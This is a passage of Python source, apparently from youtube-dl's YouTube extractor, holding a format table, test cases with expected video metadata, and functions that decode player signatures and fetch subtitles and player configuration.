'132': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'151': {'ext': 'mp4', 'height': 72, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 24, 'vcodec': 'h264', 'preference': -10},
# DASH mp4 video
'133': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'h264'},
'134': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'h264'},
'135': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'136': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264'},
'137': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264'},
'138': {'ext': 'mp4', 'format_note': 'DASH video', 'vcodec': 'h264'}, # Height can vary (https://github.com/rg3/youtube-dl/issues/4559)
'160': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'h264'},
'212': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'264': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'h264'},
'298': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'299': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'266': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'h264'},
# Dash mp4 audio
'139': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 48, 'container': 'm4a_dash'},
'140': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 128, 'container': 'm4a_dash'},
'141': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 256, 'container': 'm4a_dash'},
'256': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'258': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'325': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'dtse', 'container': 'm4a_dash'},
'328': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'ec-3', 'container': 'm4a_dash'},
# Dash webm
'167': {'ext': 'webm', 'height': 360, 'width': 640, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'168': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'169': {'ext': 'webm', 'height': 720, 'width': 1280, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'170': {'ext': 'webm', 'height': 1080, 'width': 1920, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'218': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'219': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'278': {'ext': 'webm', 'height': 144, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp9'},
'242': {'ext': 'webm', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'243': {'ext': 'webm', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'244': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'245': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'246': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'247': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'248': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'271': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9'},
# itag 272 videos are either 3840x2160 (e.g. RtoitU2A-3E) or 7680x4320 (sLprVF6d7Ug)
'272': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'302': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'303': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'308': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'313': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'315': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
# Dash webm audio
'171': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 128},
'172': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 256},
# Dash webm audio with opus inside
'249': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 50},
'250': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 70},
'251': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 160},
# RTMP (unnamed)
'_rtmp': {'protocol': 'rtmp'},
}
_SUBTITLE_FORMATS = ('ttml', 'vtt')
_GEO_BYPASS = False
IE_NAME = 'youtube'
_TESTS = [
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&t=1s&end=9',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'license': 'Standard YouTube License',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact [email protected] .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'like_count': int,
'dislike_count': int,
'start_time': 1,
'end_time': 9,
}
},
{
'url': 'https://www.youtube.com/watch?v=UxxajLWwzqY',
'note': 'Test generic use_cipher_signature video (#897)',
'info_dict': {
'id': 'UxxajLWwzqY',
'ext': 'mp4',
'upload_date': '20120506',
'title': 'Icona Pop - I Love It (feat. Charli XCX) [OFFICIAL VIDEO]',
'alt_title': 'I Love It (feat. Charli XCX)',
'description': 'md5:f3ceb5ef83a08d95b9d146f973157cc8',
'tags': ['Icona Pop i love it', 'sweden', 'pop music', 'big beat records', 'big beat', 'charli',
'xcx', 'charli xcx', 'girls', 'hbo', 'i love it', "i don't care", 'icona', 'pop',
'iconic ep', 'iconic', 'love', 'it'],
'duration': 180,
'uploader': 'Icona Pop',
'uploader_id': 'IconaPop',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IconaPop',
'license': 'Standard YouTube License',
'creator': 'Icona Pop',
'track': 'I Love It (feat. Charli XCX)',
'artist': 'Icona Pop',
}
},
{
'url': 'https://www.youtube.com/watch?v=07FYdnEawAQ',
'note': 'Test VEVO video with age protection (#956)',
'info_dict': {
'id': '07FYdnEawAQ',
'ext': 'mp4',
'upload_date': '20130703',
'title': 'Justin Timberlake - Tunnel Vision (Explicit)',
'alt_title': 'Tunnel Vision',
'description': 'md5:64249768eec3bc4276236606ea996373',
'duration': 419,
'uploader': 'justintimberlakeVEVO',
'uploader_id': 'justintimberlakeVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/justintimberlakeVEVO',
'license': 'Standard YouTube License',
'creator': 'Justin Timberlake',
'track': 'Tunnel Vision',
'artist': 'Justin Timberlake',
'age_limit': 18,
}
},
{
'url': '//www.YouTube.com/watch?v=yZIXLfi8CZQ',
'note': 'Embed-only video (#1746)',
'info_dict': {
'id': 'yZIXLfi8CZQ',
'ext': 'mp4',
'upload_date': '20120608',
'title': 'Principal Sexually Assaults A Teacher - Episode 117 - 8th June 2012',
'description': 'md5:09b78bd971f1e3e289601dfba15ca4f7',
'uploader': 'SET India',
'uploader_id': 'setindia',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/setindia',
'license': 'Standard YouTube License',
'age_limit': 18,
}
},
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&v=UxxajLWwzqY',
'note': 'Use the first video ID in the URL',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'license': 'Standard YouTube License',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact [email protected] .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?v=a9LDPn-MO4I',
'note': '256k DASH audio (format 141) via DASH manifest',
'info_dict': {
'id': 'a9LDPn-MO4I',
'ext': 'm4a',
'upload_date': '20121002',
'uploader_id': '8KVIDEO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/8KVIDEO',
'description': '',
'uploader': '8KVIDEO',
'license': 'Standard YouTube License',
'title': 'UHDTV TEST 8K VIDEO.mp4'
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141',
},
'skip': 'format 141 not served anymore',
},
# DASH manifest with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=IB3lcPjvWLA',
'info_dict': {
'id': 'IB3lcPjvWLA',
'ext': 'm4a',
'title': 'Afrojack, Spree Wilson - The Spark ft. Spree Wilson',
'description': 'md5:1900ed86ee514927b9e00fbead6969a5',
'duration': 244,
'uploader': 'AfrojackVEVO',
'uploader_id': 'AfrojackVEVO',
'upload_date': '20131011',
'license': 'Standard YouTube License',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# JS player signature function name containing $
{
'url': 'https://www.youtube.com/watch?v=nfWlot6h_JM',
'info_dict': {
'id': 'nfWlot6h_JM',
'ext': 'm4a',
'title': 'Taylor Swift - Shake It Off',
'alt_title': 'Shake It Off',
'description': 'md5:95f66187cd7c8b2c13eb78e1223b63c3',
'duration': 242,
'uploader': 'TaylorSwiftVEVO',
'uploader_id': 'TaylorSwiftVEVO',
'upload_date': '20140818',
'license': 'Standard YouTube License',
'creator': 'Taylor Swift',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# Controversy video
{
'url': 'https://www.youtube.com/watch?v=T4XJQO3qol8',
'info_dict': {
'id': 'T4XJQO3qol8',
'ext': 'mp4',
'duration': 219,
'upload_date': '20100909',
'uploader': 'TJ Kirk',
'uploader_id': 'TheAmazingAtheist',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheAmazingAtheist',
'license': 'Standard YouTube License',
'title': 'Burning Everyone\'s Koran',
'description': 'SUBSCRIBE: http://www.youtube.com/saturninefilms\n\nEven Obama has taken a stand against freedom on this issue: http://www.huffingtonpost.com/2010/09/09/obama-gma-interview-quran_n_710282.html',
}
},
# Normal age-gate video (No vevo, embed allowed)
{
'url': 'https://youtube.com/watch?v=HtVdAasjOgU',
'info_dict': {
'id': 'HtVdAasjOgU',
'ext': 'mp4',
'title': 'The Witcher 3: Wild Hunt - The Sword Of Destiny Trailer',
'description': r're:(?s).{100,}About the Game\n.*?The Witcher 3: Wild Hunt.{100,}',
'duration': 142,
'uploader': 'The Witcher',
'uploader_id': 'WitcherGame',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/WitcherGame',
'upload_date': '20140605',
'license': 'Standard YouTube License',
'age_limit': 18,
},
},
# Age-gate video with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=6kLq3WMV1nU',
'info_dict': {
'id': '6kLq3WMV1nU',
'ext': 'webm',
'title': 'Dedication To My Ex (Miss That) (Lyric Video)',
'description': 'md5:33765bb339e1b47e7e72b5490139bb41',
'duration': 246,
'uploader': 'LloydVEVO',
'uploader_id': 'LloydVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/LloydVEVO',
'upload_date': '20110629',
'license': 'Standard YouTube License',
'age_limit': 18,
},
},
# video_info is None (https://github.com/rg3/youtube-dl/issues/4421)
# YouTube Red ad is not captured for creator
{
'url': '__2ABJjxzNo',
'info_dict': {
'id': '__2ABJjxzNo',
'ext': 'mp4',
'duration': 266,
'upload_date': '20100430',
'uploader_id': 'deadmau5',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/deadmau5',
'creator': 'deadmau5',
'description': 'md5:12c56784b8032162bb936a5f76d55360',
'uploader': 'deadmau5',
'license': 'Standard YouTube License',
'title': 'Deadmau5 - Some Chords (HD)',
'alt_title': 'Some Chords',
},
'expected_warnings': [
'DASH manifest missing',
]
},
# Olympics (https://github.com/rg3/youtube-dl/issues/4431)
{
'url': 'lqQg6PlCWgI',
'info_dict': {
'id': 'lqQg6PlCWgI',
'ext': 'mp4',
'duration': 6085,
'upload_date': '20150827',
'uploader_id': 'olympic',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/olympic',
'license': 'Standard YouTube License',
'description': 'HO09 - Women - GER-AUS - Hockey - 31 July 2012 - London 2012 Olympic Games',
'uploader': 'Olympic',
'title': 'Hockey - Women - GER-AUS - London 2012 Olympic Games',
},
'params': {
'skip_download': 'requires avconv',
}
},
# Non-square pixels
{
'url': 'https://www.youtube.com/watch?v=_b-2C3KPAM0',
'info_dict': {
'id': '_b-2C3KPAM0',
'ext': 'mp4',
'stretched_ratio': 16 / 9.,
'duration': 85,
'upload_date': '20110310',
'uploader_id': 'AllenMeow',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/AllenMeow',
'description': 'made by Wacom from Korea | 字幕&加油添醋 by TY\'s Allen | 感謝heylisa00cavey1001同學熱情提供梗及翻譯',
'uploader': '孫ᄋᄅ',
'license': 'Standard YouTube License',
'title': '[A-made] 變態妍字幕版 太妍 我就是這樣的人',
},
},
# url_encoded_fmt_stream_map is empty string
{
'url': 'qEJwOuvDf7I',
'info_dict': {
'id': 'qEJwOuvDf7I',
'ext': 'webm',
'title': 'Обсуждение судебной практики по выборам 14 сентября 2014 года в Санкт-Петербурге',
'description': '',
'upload_date': '20150404',
'uploader_id': 'spbelect',
'uploader': 'Наблюдатели Петербурга',
},
'params': {
'skip_download': 'requires avconv',
},
'skip': 'This live event has ended.',
},
# Extraction from multiple DASH manifests (https://github.com/rg3/youtube-dl/pull/6097)
{
'url': 'https://www.youtube.com/watch?v=FIl7x6_3R5Y',
'info_dict': {
'id': 'FIl7x6_3R5Y',
'ext': 'webm',
'title': 'md5:7b81415841e02ecd4313668cde88737a',
'description': 'md5:116377fd2963b81ec4ce64b542173306',
'duration': 220,
'upload_date': '20150625',
'uploader_id': 'dorappi2000',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/dorappi2000',
'uploader': 'dorappi2000',
'license': 'Standard YouTube License',
'formats': 'mincount:31',
},
'skip': 'not actual anymore',
},
# DASH manifest with segment_list
{
'url': 'https://www.youtube.com/embed/CsmdDsKjzN8',
'md5': '8ce563a1d667b599d21064e982ab9e31',
'info_dict': {
'id': 'CsmdDsKjzN8',
'ext': 'mp4',
'upload_date': '20150501', # According to '<meta itemprop="datePublished"', but in other places it's 20150510
'uploader': 'Airtek',
'description': 'Retransmisión en directo de la XVIII media maratón de Zaragoza.',
'uploader_id': 'UCzTzUmjXxxacNnL8I3m4LnQ',
'license': 'Standard YouTube License',
'title': 'Retransmisión XVIII Media maratón Zaragoza 2015',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '135', # bestvideo
},
'skip': 'This live event has ended.',
},
{
# Multifeed videos (multiple cameras), URL is for Main Camera
'url': 'https://www.youtube.com/watch?v=jqWvoWXjCVs',
'info_dict': {
'id': 'jqWvoWXjCVs',
'title': 'teamPGP: Rocket League Noob Stream',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
},
'playlist': [{
'info_dict': {
'id': 'jqWvoWXjCVs',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (Main Camera)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7335,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': '6h8e8xoXJzg',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (kreestuh)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'PUOgX5z9xZw',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (grizzle)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'teuwxikvS5k',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (zim)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7334,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}],
'params': {
'skip_download': True,
},
},
{
# Multifeed video with comma in title (see https://github.com/rg3/youtube-dl/issues/8536)
'url': 'https://www.youtube.com/watch?v=gVfLd0zydlo',
'info_dict': {
'id': 'gVfLd0zydlo',
'title': 'DevConf.cz 2016 Day 2 Workshops 1 14:00 - 15:30',
},
'playlist_count': 2,
'skip': 'Not multifeed anymore',
},
{
'url': 'https://vid.plus/FlRa-iH7PGw',
'only_matching': True,
},
{
'url': 'https://zwearz.com/watch/9lWxNJF-ufM/electra-woman-dyna-girl-official-trailer-grace-helbig.html',
'only_matching': True,
},
{
# Title with JS-like syntax "};" (see https://github.com/rg3/youtube-dl/issues/7468)
# Also tests cut-off URL expansion in video description (see
# https://github.com/rg3/youtube-dl/issues/1892,
# https://github.com/rg3/youtube-dl/issues/8164)
'url': 'https://www.youtube.com/watch?v=lsguqyKfVQg',
'info_dict': {
'id': 'lsguqyKfVQg',
'ext': 'mp4',
'title': '{dark walk}; Loki/AC/Dishonored; collab w/Elflover21',
'alt_title': 'Dark Walk - Position Music',
'description': 'md5:8085699c11dc3f597ce0410b0dcbb34a',
'duration': 133,
'upload_date': '20151119',
'uploader_id': 'IronSoulElf',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IronSoulElf',
'uploader': 'IronSoulElf',
'license': 'Standard YouTube License',
'creator': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
'track': 'Dark Walk - Position Music',
'artist': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
},
'params': {
'skip_download': True,
},
},
{
# Tags with '};' (see https://github.com/rg3/youtube-dl/issues/7468)
'url': 'https://www.youtube.com/watch?v=Ms7iBXnlUO8',
'only_matching': True,
},
{
# Video with yt:stretch=17:0
'url': 'https://www.youtube.com/watch?v=Q39EVAstoRM',
'info_dict': {
'id': 'Q39EVAstoRM',
'ext': 'mp4',
'title': 'Clash Of Clans#14 Dicas De Ataque Para CV 4',
'description': 'md5:ee18a25c350637c8faff806845bddee9',
'upload_date': '20151107',
'uploader_id': 'UCCr7TALkRbo3EtFzETQF1LA',
'uploader': 'CH GAMER DROID',
},
'params': {
'skip_download': True,
},
'skip': 'This video does not exist.',
},
{
# Video licensed under Creative Commons
'url': 'https://www.youtube.com/watch?v=M4gD1WSo5mA',
'info_dict': {
'id': 'M4gD1WSo5mA',
'ext': 'mp4',
'title': 'md5:e41008789470fc2533a3252216f1c1d1',
'description': 'md5:a677553cf0840649b731a3024aeff4cc',
'duration': 721,
'upload_date': '20150127',
'uploader_id': 'BerkmanCenter',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/BerkmanCenter',
'uploader': 'The Berkman Klein Center for Internet & Society',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
# Channel-like uploader_url
'url': 'https://www.youtube.com/watch?v=eQcmzGIKrzg',
'info_dict': {
'id': 'eQcmzGIKrzg',
'ext': 'mp4',
'title': 'Democratic Socialism and Foreign Policy | Bernie Sanders',
'description': 'md5:dda0d780d5a6e120758d1711d062a867',
'duration': 4060,
'upload_date': '20151119',
'uploader': 'Bernie Sanders',
'uploader_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?feature=player_embedded&amp;v=V36LpHqtcDY',
'only_matching': True,
},
{
# YouTube Red paid video (https://github.com/rg3/youtube-dl/issues/10059)
'url': 'https://www.youtube.com/watch?v=i1Ko8UG-Tdo',
'only_matching': True,
},
{
# Rental video preview
'url': 'https://www.youtube.com/watch?v=yYr8q0y5Jfg',
'info_dict': {
'id': 'uGpuVWrhIzE',
'ext': 'mp4',
'title': 'Piku - Trailer',
'description': 'md5:c36bd60c3fd6f1954086c083c72092eb',
'upload_date': '20150811',
'uploader': 'FlixMatrix',
'uploader_id': 'FlixMatrixKaravan',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/FlixMatrixKaravan',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# YouTube Red video with episode data
'url': 'https://www.youtube.com/watch?v=iqKdEhx-dD4',
'info_dict': {
'id': 'iqKdEhx-dD4',
'ext': 'mp4',
'title': 'Isolation - Mind Field (Ep 1)',
'description': 'md5:25b78d2f64ae81719f5c96319889b736',
'duration': 2085,
'upload_date': '20170118',
'uploader': 'Vsauce',
'uploader_id': 'Vsauce',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Vsauce',
'license': 'Standard YouTube License',
'series': 'Mind Field',
'season_number': 1,
'episode_number': 1,
},
'params': {
'skip_download': True,
},
'expected_warnings': [
'Skipping DASH manifest',
],
},
{
# The following content has been identified by the YouTube community
# as inappropriate or offensive to some audiences.
'url': 'https://www.youtube.com/watch?v=6SJNVb0GnPI',
'info_dict': {
'id': '6SJNVb0GnPI',
'ext': 'mp4',
'title': 'Race Differences in Intelligence',
'description': 'md5:5d161533167390427a1f8ee89a1fc6f1',
'duration': 965,
'upload_date': '20140124',
'uploader': 'New Century Foundation',
'uploader_id': 'UCEJYpZGqgUob0zVVEaLhvVg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCEJYpZGqgUob0zVVEaLhvVg',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
},
{
# itag 212
'url': '1t24XAntNCY',
'only_matching': True,
},
{
# geo restricted to JP
'url': 'sJL6WA-aGkQ',
'only_matching': True,
},
{
'url': 'https://www.youtube.com/watch?v=MuAGGZNfUkU&list=RDMM',
'only_matching': True,
},
]
def __init__(self, *args, **kwargs):
super(YoutubeIE, self).__init__(*args, **kwargs)
self._player_cache = {}
def report_video_info_webpage_download(self, video_id):
"""Report attempt to download video info webpage."""
self.to_screen('%s: Downloading video info webpage' % video_id)
def report_information_extraction(self, video_id):
"""Report attempt to extract video information."""
self.to_screen('%s: Extracting video information' % video_id)
def report_unavailable_format(self, video_id, format):
"""Report extracted video URL."""
self.to_screen('%s: Format %s not available' % (video_id, format))
def report_rtmp_download(self):
"""Indicate the download will use the RTMP protocol."""
self.to_screen('RTMP download detected')
def _signature_cache_id(self, example_sig):
""" Return a string representation of a signature """
return '.'.join(compat_str(len(part)) for part in example_sig.split('.'))
def _extract_signature_function(self, video_id, player_url, example_sig):
id_m = re.match(
r'.*?-(?P<id>[a-zA-Z0-9_-]+)(?:/watch_as3|/html5player(?:-new)?|(?:/[a-z]{2}_[A-Z]{2})?/base)?\.(?P<ext>[a-z]+)$',
player_url)
if not id_m:
raise ExtractorError('Cannot identify player %r' % player_url)
player_type = id_m.group('ext')
player_id = id_m.group('id')
# Read from filesystem cache
func_id = '%s_%s_%s' % (
player_type, player_id, self._signature_cache_id(example_sig))
assert os.path.basename(func_id) == func_id
cache_spec = self._downloader.cache.load('youtube-sigfuncs', func_id)
if cache_spec is not None:
return lambda s: ''.join(s[i] for i in cache_spec)
download_note = (
'Downloading player %s' % player_url
if self._downloader.params.get('verbose') else
'Downloading %s player %s' % (player_type, player_id)
)
if player_type == 'js':
code = self._download_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
res = self._parse_sig_js(code)
elif player_type == 'swf':
urlh = self._request_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
code = urlh.read()
res = self._parse_sig_swf(code)
else:
assert False, 'Invalid player type %r' % player_type
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = res(test_string)
cache_spec = [ord(c) for c in cache_res]
self._downloader.cache.store('youtube-sigfuncs', func_id, cache_spec)
return res
def _print_sig_code(self, func, example_sig):
def gen_sig_code(idxs):
def _genslice(start, end, step):
starts = '' if start == 0 else str(start)
ends = (':%d' % (end + step)) if end + step >= 0 else ':'
steps = '' if step == 1 else (':%d' % step)
return 's[%s%s%s]' % (starts, ends, steps)
step = None
# Quelch pyflakes warnings - start will be set when step is set
start = '(Never used)'
for i, prev in zip(idxs[1:], idxs[:-1]):
if step is not None:
if i - prev == step:
continue
yield _genslice(start, prev, step)
step = None
continue
if i - prev in [-1, 1]:
step = i - prev
start = prev
continue
else:
yield 's[%d]' % prev
if step is None:
yield 's[%d]' % i
else:
yield _genslice(start, i, step)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = func(test_string)
cache_spec = [ord(c) for c in cache_res]
expr_code = ' + '.join(gen_sig_code(cache_spec))
signature_id_tuple = '(%s)' % (
', '.join(compat_str(len(p)) for p in example_sig.split('.')))
code = ('if tuple(len(p) for p in s.split(\'.\')) == %s:\n'
' return %s\n') % (signature_id_tuple, expr_code)
self.to_screen('Extracted signature function:\n' + code)
def _parse_sig_js(self, jscode):
funcname = self._search_regex(
(r'(["\'])signature\1\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\.sig\|\|(?P<sig>[a-zA-Z0-9$]+)\(',
r'yt\.akamaized\.net/\)\s*\|\|\s*.*?\s*c\s*&&\s*d\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*d\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\('),
jscode, 'Initial JS player signature function name', group='sig')
jsi = JSInterpreter(jscode)
initial_function = jsi.extract_function(funcname)
return lambda s: initial_function([s])
def _parse_sig_swf(self, file_contents):
swfi = SWFInterpreter(file_contents)
TARGET_CLASSNAME = 'SignatureDecipher'
searched_class = swfi.extract_class(TARGET_CLASSNAME)
initial_function = swfi.extract_function(searched_class, 'decipher')
return lambda s: initial_function([s])
def _decrypt_signature(self, s, video_id, player_url, age_gate=False):
"""Turn the encrypted s field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt signature without player_url')
if player_url.startswith('//'):
player_url = 'https:' + player_url
elif not re.match(r'https?://', player_url):
player_url = compat_urlparse.urljoin(
'https://www.youtube.com', player_url)
try:
player_id = (player_url, self._signature_cache_id(s))
if player_id not in self._player_cache:
func = self._extract_signature_function(
video_id, player_url, s
)
self._player_cache[player_id] = func
func = self._player_cache[player_id]
if self._downloader.params.get('youtube_print_sig_code'):
self._print_sig_code(func, s)
return func(s)
except Exception as e:
tb = traceback.format_exc()
raise ExtractorError(
'Signature extraction failed: ' + tb, cause=e)
def _get_subtitles(self, video_id, webpage):
try:
subs_doc = self._download_xml(
'https://video.google.com/timedtext?hl=en&type=list&v=%s' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
sub_lang_list = {}
for track in subs_doc.findall('track'):
lang = track.attrib['lang_code']
if lang in sub_lang_list:
continue
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': lang,
'v': video_id,
'fmt': ext,
'name': track.attrib['name'].encode('utf-8'),
})
sub_formats.append({
'url': 'https://www.youtube.com/api/timedtext?' + params,
'ext': ext,
})
sub_lang_list[lang] = sub_formats
if not sub_lang_list:
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
return sub_lang_list
def _get_ytplayer_config(self, video_id, webpage):
patterns = (
# User data may contain arbitrary character sequences that may affect
# JSON extraction with regex, e.g. when '};' is contained the second
# regex won't capture the whole JSON. Yet working around by trying more
# concrete regex first keeping in mind proper quoted string handling
# to be implemented in future that will replace this workaround (see
# https://github.com/rg3/youtube-dl/issues/7468,
# https://github.com/rg3/youtube-dl/pull/7599)
r';ytplayer\.config\s*=\s*({.+?});ytplayer',
r';ytplayer\.config\s*=\s*({.+?});',
)
config = self._search_regex(
patterns, webpage, 'ytplayer.config', default=None)
if config:
